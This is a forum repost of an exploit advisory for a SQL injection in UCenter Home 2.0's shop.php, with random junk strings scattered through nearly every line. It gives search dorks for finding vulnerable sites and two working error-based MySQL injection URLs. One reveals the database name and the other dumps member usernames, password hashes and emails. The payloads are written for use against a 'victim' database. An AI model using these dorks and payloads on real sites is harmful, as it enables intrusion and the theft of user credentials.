中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
0 a  h; z5 T0 L! M8 I3 e# u5 Y4 o
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
, u! J( E) V- M' E) i, F
, A$ ^5 K' G. l3 p( v" I; ]2 m) j                                 ! G! w& n) X( T" l8 S* p

3 T2 J  Z! L# p*/ Author : KnocKout  
, W# l# `' I* r/ T) _  h5 a; r0 o9 q) r5 X+ H
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
# N, h# g8 n% c
! k# c  ?# p% Z2 g+ J8 i- |1 K" p*/ Contact: knockoutr@msn.com  
/ T. _- ~  Z0 w- C
. s" ~, d6 i& x5 b; P8 O*/ Cyber-Warrior.org/CWKnocKout  
! p' q3 N2 ?/ B. O0 a& n- y$ t
+ l. `- C  W7 f$ e$ [5 `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
1 o$ J- a/ P0 A
" h' s" f) S% b. p' VScript : UCenter Home  7 o7 Q/ J. ^' S5 R
) K1 l/ d- e' ~3 X- z; H4 g
Version : 2.0  , }: h, c7 |* I. V) X# S

9 H( F+ g! e% ]  jScript HomePage : http://u.discuz.net/  8 P8 ?7 R8 x! z
1 L0 W/ I6 G! y+ @( Z: _3 ?' x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  * N; a& G/ L9 R" y2 v5 b0 l
1 T8 T) Q: |. R" V( q2 Q
Dork : Powered by UCenter inurl:shop.php?ac=view  
. y5 t/ z* I) y7 h2 Q  |. n' W2 I) P5 D
Dork 2 : inurl:shop.php?ac=view&shopid=  
& i# `' r5 n: B
0 a" {/ C' N/ H6 m4 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  - X3 z0 p( `: [" k% [3 |; m( S0 `

. q5 H. o  u0 u# G. F4 o% nVuln file : Shop.php  $ j% e  C( q/ v7 I9 u+ l0 B
+ A8 e/ q/ ]8 W, t& B
value's : (?)ac=view&shopid=  
# Q2 O  l# p1 X  X/ f! J
4 x" L* J( C& r' RVulnerable Style : SQL Injection (MySQL Error Based)    \; b. h4 Y5 v; }
5 k" `( Z" \9 b3 P
Need Metarials : Hex Conversion  6 H* o6 K! @( r
/ t' r' V, s9 _7 U- U  U6 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
3 c; E; B% Y7 U9 Q6 h
) U( x; S+ }. `! e$ P% P3 H5 AYour Need victim Database name.   / Z4 K- q- U7 X, P  e
# }7 m% x$ U1 g6 D6 B+ x
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  % F5 J6 j. }9 u  U4 L: h& |# Y9 }' W
2 F! W% f/ h; [0 C- P- u7 ]* B
..  % h$ [7 C2 f. N; l* X

' ]( c) @/ \  p7 o. i: T3 hDB : Okey.  
. o4 R5 |0 `& B
1 e8 ^9 Q! _* [* H% F, jyour edit DB `[TARGET DB NAME]`  ; b& C* e# q8 B6 w7 r
" n1 B, Q0 K# L
Example : 'hiwir1_ucenter'  " u# Y+ t/ R, [; ^3 l2 {
8 E% D4 a4 p5 f8 E
Edit : Okey.  
7 ^/ i: {2 B4 U% }+ a' H
! ?2 O: S; D5 p: K! cYour use Hex conversion. And edit Your SQL Injection Exploit..  
5 `! D$ O3 t( ]6 Q  C; o
8 S+ c$ s6 p, E* ~   ' X' s* z8 h- F, O- _& y
$ Z9 y3 u* o2 d8 {& n
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
4 b: Z! K2 Z) e+ \+ G1 S* ~



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2